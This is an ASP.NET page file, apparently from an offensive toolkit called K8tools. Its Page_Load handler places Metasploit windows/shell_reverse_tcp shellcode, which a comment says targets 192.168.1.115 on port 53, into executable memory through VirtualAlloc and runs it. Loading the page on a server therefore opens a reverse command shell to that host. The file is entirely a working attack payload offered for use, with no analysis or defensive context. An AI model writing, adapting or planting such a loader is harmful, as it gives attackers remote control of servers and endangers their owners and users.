K8tools
/
shellcode.aspx

<%@ Page Language="C#" AutoEventWireup="true" Inherits="System.Web.UI.Page" %>

<%@ Import Namespace="System" %>
<%@ Import Namespace="System.Runtime.InteropServices" %>

<script runat="server">
    delegate int MsfpayloadProc();
    protected void Page_Load(object sender, EventArgs e)
    {
        byte[] codeBytes = {

//msfpayload windows/shell_reverse_tcp LHOST=192.168.1.115 LPORT=53 X C

0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,
0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,
0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,
0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,
0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,
0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,
0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,
0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,
0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,
0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,
0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,
0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,
0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,
0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,
0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,
0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,
0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,
0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,
0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,
0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,
0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,
0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,
0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,
0xff,0xd5,0x97,0x6a,0x05,0x68,0xc0,0xa8,
0x01,0x73,0x68,0x02,0x00,0x00,0x35,0x89,
0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,
0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,
0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,
0xa2,0x56,0xff,0xd5,0x68,0x63,0x6d,0x64,
0x00,0x89,0xe3,0x57,0x57,0x57,0x31,0xf6,
0x6a,0x12,0x59,0x56,0xe2,0xfd,0x66,0xc7,
0x44,0x24,0x3c,0x01,0x01,0x8d,0x44,0x24,
0x10,0xc6,0x00,0x44,0x54,0x50,0x56,0x56,
0x56,0x46,0x56,0x4e,0x56,0x56,0x53,0x56,
0x68,0x79,0xcc,0x3f,0x86,0xff,0xd5,0x89,
0xe0,0x4e,0x56,0x46,0xff,0x30,0x68,0x08,
0x87,0x1d,0x60,0xff,0xd5,0xbb,0xf0,0xb5,
0xa2,0x56,0x68,0xa6,0x95,0xbd,0x9d,0xff,
0xd5,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,
0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,
0x00,0x53,0xff,0xd5
                    };
        IntPtr handle = IntPtr.Zero;
        handle = VirtualAlloc(
            IntPtr.Zero,
            codeBytes.Length,
            MEM_COMMIT | MEM_RESERVE,
            PAGE_EXECUTE_READWRITE);
        try
        {
            Marshal.Copy(codeBytes, 0, handle, codeBytes.Length);
            MsfpayloadProc msfpayload
               = Marshal.GetDelegateForFunctionPointer(handle, typeof(MsfpayloadProc)) as MsfpayloadProc;
            msfpayload();
        }
        finally
        {
            VirtualFree(handle, 0, MEM_RELEASE);
        }
    }
    //Windows API
    [DllImport("Kernel32.dll", EntryPoint = "VirtualAlloc")]
    public static extern IntPtr VirtualAlloc(IntPtr address, int size, uint allocType, uint protect);
    [DllImport("Kernel32.dll", EntryPoint = "VirtualFree")]
    public static extern bool VirtualFree(IntPtr address, int size, uint freeType);
    //flags
    const uint MEM_COMMIT = 0x1000;
    const uint MEM_RESERVE = 0x2000;
    const uint PAGE_EXECUTE_READWRITE = 0x40;
    const uint MEM_RELEASE = 0x8000;
</script>